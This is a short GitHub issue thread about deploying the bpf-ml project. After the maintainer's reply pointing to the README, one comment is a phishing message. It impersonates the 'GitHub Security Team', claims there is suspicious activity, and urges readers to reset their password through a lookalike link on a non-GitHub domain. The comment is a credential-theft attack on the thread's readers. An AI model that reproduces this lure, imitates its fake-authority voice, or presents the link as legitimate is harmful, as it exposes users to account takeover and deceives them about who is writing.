### ISSUE TITLE
I'm interested in this project. What do I need to do to deploy it locally? How can I use this project?

### ISSUE THREAD

**Issue by wastedfishcn** [motus/bpf-ml#1]

**Comment by motus** [comment]
I've added the instructions to [README.md](/motus/bpf-ml#readme). Hope that helps!

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
